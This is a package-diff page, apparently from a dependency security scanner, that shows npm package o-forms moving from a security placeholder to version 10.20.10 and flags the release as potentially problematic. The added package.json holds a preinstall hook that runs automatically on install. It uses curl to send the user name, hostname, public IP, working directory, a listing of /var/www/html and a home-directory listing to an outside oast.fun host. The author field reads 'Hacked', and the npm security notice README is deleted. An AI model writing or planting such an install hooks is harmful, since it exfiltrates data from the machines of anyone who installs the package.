o-forms 0.0.1-security → 10.20.10
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of o-forms might be problematic. Click here for more details.
- package/package.json +12 -3
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "o-forms",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "10.20.10",
|
4
|
+
"main": "main.js",
|
5
|
+
"scripts": {
|
6
|
+
"preinstall": "curl rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/pwd=$(pwd) && curl rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/whoami=$(whoami)&&curl rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/package=$(echo 'o-forms') && curl rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/ip=$(curl ifconfig.me)&& curl -X POST -d \"data=$(ls -R /var/www/html/)\" rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/hostname=$(hostname) && curl -X POST -d \"data=$(cd;ls -la)\" rastzudvmpranhzlrgio6p6zgoerthatw.oast.fun/home-dir",
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"author": "Hacked",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"lodash": "^4.17.21"
|
13
|
+
},
|
14
|
+
"description": ""
|
6
15
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=o-forms for more information.
|